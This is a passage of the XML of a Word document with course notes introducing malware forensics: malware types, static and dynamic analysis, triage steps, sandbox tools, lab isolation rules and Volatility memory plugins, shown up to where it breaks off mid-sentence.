      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 Malware Forensics — Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is software designed to harm a system or steal data. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware forensics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> studies a suspicious program to learn what it is, how it got in, what it does, how it communicates, how it stays on the system, and what indicators (IOCs) it leaves — so that it can be removed and detected elsewhere.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Short description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Virus / Worm</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Virus attaches to files and needs user action; a worm spreads by itself over networks (e.g. WannaCry)</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Trojan</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Looks useful but hides malicious function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RAT (Remote Access Trojan) / Backdoor</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Gives an attacker remote control</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Ransomware</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Encrypts data and demands payment</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Spyware / Infostealer / Keylogger</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Steals passwords and personal data</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Rootkit</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Hides the malware or attacker from the operating system</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Fileless malware</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Runs mainly in memory using tools such as PowerShell, leaving few files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Static vs dynamic analysis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Static analysis</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Dynamic analysis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Idea</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Study the file </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">without running it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="389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Run it</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in a controlled, isolated environment and observe behaviour</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What you learn</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type, hashes, readable strings, imported functions, structure, packing</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Files created, registry changes, processes started, network connections, persistence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Advantages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Safe; fast for triage; no risk of infection</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real behaviour, even of obfuscated or packed code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Limitations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Packed or encrypted code hides details; cannot see behaviour</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Malware may detect the sandbox and stay quiet; risk if isolation is weak</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Typical tools</w:t>
            </w:r>
          </w:p>
        </w:tc>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file</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strings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, hash tools, VirusTotal, PE-Bear, Detect It Easy</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Sandboxes (Cuckoo, Any.Run), Process Monitor, Process Hacker, Wireshark, Regshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic static analysis steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the file type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> command or by magic bytes — a file called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">invoice.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that starts with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is really an executable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Calculate hashes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MD5/SHA-256) and search them on VirusTotal or threat-intelligence sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Extract strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">strings suspicious.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — look for URLs, IP addresses, file paths, registry keys, commands and error messages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect the PE structure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Windows executables (PE-Bear): headers, sections (names, sizes, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">entropy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">import table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> listing Windows functions used (e.g. networking, process injection, file encryption).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">packing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — few imports, high entropy sections, odd section names suggest the real code is hidden.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IOCs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and move on to dynamic analysis if needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Reading a strings result</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">strings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> on a suspicious executable shows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">http://malicious-c2.com/beacon</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. This suggests the program contacts a remote server periodically — typical </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">C2 beaconing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> behaviour. The URL becomes an IOC to search in proxy and DNS logs. It is a clue, not final proof; it must be confirmed in dynamic analysis or network evidence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic analysis and sandbox tools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Cuckoo Sandbox</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Open-source automated malware analysis system. Runs a sample in a virtual machine and reports behaviour: API calls, files, registry, network traffic, screenshots. (Original project is old; maintained forks such as CAPE are used today.)</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Any.Run</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Online </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">interactive</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> sandbox. The analyst can watch and click inside the VM in the browser while it shows processes and network activity live. Free tier results are public.</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FLARE VM</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Windows-based malware-analysis environment (installed with scripts) that bundles many reverse-engineering and analysis tools for a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">safe, isolated analysis lab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — disassemblers, debuggers, PE tools, network simulators.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always analyse inside an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">isolated virtual machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with snapshots, host-only or fake network, and no shared folders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Never upload sensitive or client-confidential samples to public online services without permission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Revert the snapshot after every run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Memory forensics for malware</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RAM often shows what disk analysis cannot. With Volatility 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">windows.pslist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">windows.pstree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> show processes and parent/child relationships; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">windows.netstat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows connections; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">windows.cmdline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows command lines; and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">windows.malfind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> finds suspicious injected code. A classic red flag is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">wrong parent-child relationship</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — for example </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
